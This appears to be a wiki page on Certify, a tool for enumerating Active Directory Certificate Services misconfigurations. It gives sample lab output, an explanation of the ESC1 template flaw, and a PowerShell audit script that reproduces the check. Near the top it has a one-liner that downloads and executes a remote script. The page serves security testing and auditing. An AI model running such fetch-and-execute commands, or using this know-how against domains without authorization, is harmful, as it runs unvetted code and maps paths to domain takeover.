Certify

Certify is a C# tool to enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS).

@harmj0y and @tifkin_ are the primary authors of Certify and of the associated AD CS research (the "Certified Pre-Owned" blog post and whitepaper).

Installation

Compile the .exe yourself from the Certify repository, or load the PowerShell wrapper below (PowerSharpPack embeds the compiled assembly and exposes it as Invoke-Certify). The examples use the PowerShell implementation. Note that the one-liner downloads and executes code from a third-party repository: review the script, or pin it to a specific commit, before running it anywhere other than a lab.

iex((iwr https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Certify.ps1).content)

Examples

Identify vulnerable PKIs

PS Z:\> Invoke-Certify -Command 'find /vulnerable'

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.0.0

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=offsec,DC=nl'

[*] Listing info about the Enterprise CA 'offsec-DC01PKI-CA'

    Enterprise CA Name            : offsec-DC01PKI-CA
    DNS Hostname                  : DC01PKI.offsec.nl
    FullName                      : DC01PKI.offsec.nl\offsec-DC01PKI-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=offsec-DC01PKI-CA, DC=offsec, DC=nl
    Cert Thumbprint               : 2CFF52459C3F6C9BD541FDDAF3CC6F0EA72671CC
    Cert Serial                   : 1C0000000565446F3BBD81156A000000000005
    Cert Start Date               : 12/20/2021 6:34:12 AM
    Cert End Date                 : 12/20/2026 6:44:12 AM
    Cert Chain                    : CN=DC01PKI-N1-CA -> CN=offsec-DC01PKI-CA,DC=offsec,DC=nl
    UserSpecifiedSAN              : Disabled
    CA Permissions                :
      Owner: BUILTIN\Administrators        S-1-5-32-544

      Access Rights                                     Principal

      Allow  Enroll                                     NT AUTHORITY\Authenticated Users S-1-5-11
      Allow  Read, Enroll                               NT AUTHORITY\NETWORK SERVICE  S-1-5-20
      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544
      Allow  ManageCA, ManageCertificates               offsec\Domain Admins      S-1-5-21-497837788-612300594-3587273769-512
      Allow  ManageCA, ManageCertificates               offsec\Enterprise Admins  S-1-5-21-497837788-612300594-3587273769-519
    Enrollment Agent Restrictions : None

[!] Vulnerable certificate templates that exist but an Enterprise CA does not publish:

    ConfigMgrWebServerCertificate


[!] Vulnerable Certificates Templates :

    CA Name                         : DC01PKI.offsec.nl\offsec-DC01PKI-CA
    Template Name                   : UsersOffsecAD
    Schema Version                  : 2
    Validity Period                 : 1 year
    Renewal Period                  : 6 weeks
    msPKI-Certificates-Name-Flag    : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag           : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
    Authorized Signatures Required  : 0
    pkiextendedkeyusage             : Client Authentication
    Permissions
      Enrollment Permissions
        Enrollment Rights           : offsec\Domain Admins      S-1-5-21-497837788-612300594-3587273769-512
                                      offsec\Domain Users       S-1-5-21-497837788-612300594-3587273769-513
                                      offsec\Enterprise Admins  S-1-5-21-497837788-612300594-3587273769-519
      Object Control Permissions
        Owner                       : offsec\Administrator      S-1-5-21-497837788-612300594-3587273769-500
        WriteOwner Principals       : offsec\Administrator      S-1-5-21-497837788-612300594-3587273769-500
                                      offsec\Domain Admins      S-1-5-21-497837788-612300594-3587273769-512
                                      offsec\Enterprise Admins  S-1-5-21-497837788-612300594-3587273769-519
        WriteDacl Principals        : offsec\Administrator      S-1-5-21-497837788-612300594-3587273769-500
                                      offsec\Domain Admins      S-1-5-21-497837788-612300594-3587273769-512
                                      offsec\Enterprise Admins  S-1-5-21-497837788-612300594-3587273769-519
        WriteProperty Principals    : offsec\Administrator      S-1-5-21-497837788-612300594-3587273769-500
                                      offsec\Domain Admins      S-1-5-21-497837788-612300594-3587273769-512
                                      offsec\Enterprise Admins  S-1-5-21-497837788-612300594-3587273769-519

C3rt1fy completed in 00:00:01.1902168

The UsersOffsecAD template is flagged because it meets every condition of ESC1 from the Certified Pre-Owned whitepaper: the enrollee supplies the subject (ENROLLEE_SUPPLIES_SUBJECT), the EKU allows Client Authentication, no manager approval is required (PEND_ALL_REQUESTS is absent from mspki-enrollment-flag), zero authorized signatures are required, and Domain Users hold enrollment rights on a CA that grants Enroll to Authenticated Users. Any domain user can therefore request a certificate whose subject alternative name is a privileged account and authenticate as that account. ConfigMgrWebServerCertificate is listed separately because it also matches Certify's checks but no Enterprise CA publishes it, so it cannot be requested until someone with ManageCA rights publishes it.
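The ESC1 conditions that 'find /vulnerable' applies to a template can be reproduced from a plain domain-joined host without Certify, which is useful for auditing or for verifying a finding with native tooling. The script below is an added example and is not Certify's code; it queries the Certificate Templates container through System.DirectoryServices, decodes the flag bits and the template DACL, and reports templates that a low-privileged principal can enroll in. It assumes the caller is an ordinary domain user with default read access to the Configuration naming context; the SID list of "low-privileged" principals and the EKU list are this example's own choices.

```powershell
# Added example: native PowerShell reproduction of Certify's ESC1 check.
# Assumptions: run as a domain user on a domain-joined host; the Configuration
# naming context is readable (default). Not part of Certify.

$root     = [ADSI]"LDAP://RootDSE"
$configNC = $root.Get('configurationNamingContext')
$domainNC = $root.Get('defaultNamingContext')
$templateContainer = "LDAP://CN=Certificate Templates,CN=Public Key Services,CN=Services,$configNC"

# Flag bits from the AD CS template schema (MS-CRTD)
$CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001   # msPKI-Certificate-Name-Flag
$CT_FLAG_PEND_ALL_REQUESTS         = 0x00000002   # msPKI-Enrollment-Flag (manager approval)

# EKUs that let a certificate authenticate to AD (PKINIT / Schannel)
$AuthEkus = @(
    '1.3.6.1.5.5.7.3.2',        # Client Authentication
    '1.3.6.1.4.1.311.20.2.2',   # Smart Card Logon
    '1.3.6.1.5.2.3.4',          # PKINIT Client Authentication
    '2.5.29.37.0'               # Any Purpose
)

# Extended rights that grant enrollment on a template object
$EnrollRightGuids = @(
    '0e10c968-78fb-11d1-a9c0-0000f80367c1',  # Certificate-Enrollment
    'a05b8cc2-17bc-4802-a710-e7c15ab866a2'   # Certificate-AutoEnrollment
)

# Principals that effectively mean "every domain user" (example's own list)
$domainSid   = (New-Object System.Security.Principal.SecurityIdentifier(
                   [byte[]]([ADSI]"LDAP://$domainNC").Get('objectSid'), 0)).Value
$LowPrivSids = @('S-1-1-0', 'S-1-5-11', 'S-1-5-32-545',   # Everyone, Authenticated Users, Users
                 "$domainSid-513", "$domainSid-515")       # Domain Users, Domain Computers

function Get-Prop($props, $name, $default) {
    # Return the first value of an LDAP attribute or a default when it is absent
    if ($props[$name].Count) { $props[$name][0] } else { $default }
}

$searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$templateContainer)
$searcher.Filter        = '(objectClass=pKICertificateTemplate)'
$searcher.SecurityMasks = [System.DirectoryServices.SecurityMasks]::Dacl   # needed to read the DACL as a non-admin
$null = $searcher.PropertiesToLoad.AddRange([string[]]@('cn', 'msPKI-Certificate-Name-Flag',
    'msPKI-Enrollment-Flag', 'msPKI-RA-Signature', 'pKIExtendedKeyUsage', 'nTSecurityDescriptor'))

foreach ($r in $searcher.FindAll()) {
    $p = $r.Properties   # attribute names are lower-cased in the result collection
    $nameFlag   = [int](Get-Prop $p 'mspki-certificate-name-flag' 0)
    $enrollFlag = [int](Get-Prop $p 'mspki-enrollment-flag' 0)
    $raSigs     = [int](Get-Prop $p 'mspki-ra-signature' 0)
    $ekus       = @($p['pkiextendedkeyusage'])

    # ESC1: enrollee-supplied subject, auth-capable EKU, no approval, no signatures
    $suppliesSubject = ($nameFlag -band $CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT) -ne 0
    $noApproval      = ($enrollFlag -band $CT_FLAG_PEND_ALL_REQUESTS) -eq 0
    $noSignatures    = $raSigs -eq 0
    $authEku         = ($ekus.Count -eq 0) -or                     # empty EKU list behaves like Any Purpose
                       (@($ekus | Where-Object { $AuthEkus -contains $_ }).Count -gt 0)
    if (-not ($suppliesSubject -and $noApproval -and $noSignatures -and $authEku)) { continue }

    # Decode the DACL and find Enroll/AutoEnroll (or all extended rights) granted to low-priv principals
    $sd = New-Object System.DirectoryServices.ActiveDirectorySecurity
    $sd.SetSecurityDescriptorBinaryForm([byte[]]$p['ntsecuritydescriptor'][0])
    $offenders = foreach ($ace in $sd.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $hasExtendedRight = ($ace.ActiveDirectoryRights -band
                             [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight) -ne 0
        $coversEnroll     = ($ace.ObjectType -eq [Guid]::Empty) -or   # all extended rights (e.g. GenericAll)
                            ($EnrollRightGuids -contains $ace.ObjectType.ToString())
        if ($hasExtendedRight -and $coversEnroll -and ($LowPrivSids -contains $ace.IdentityReference.Value)) {
            $ace.IdentityReference.Value
        }
    }
    if ($offenders) {
        '[!] ESC1 candidate: {0}  (enrollable by: {1})' -f $p['cn'][0], ($offenders -join ', ')
    }
}
```

Against the environment in the output above this prints UsersOffsecAD with the Domain Users SID, and it would also print ConfigMgrWebServerCertificate; the script only inspects template objects, so cross-check any hit against the CA's published template list (the certificateTemplates attribute of the pKIEnrollmentService object) and the CA's own Enroll permissions, as Certify does, before treating it as exploitable.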

URL list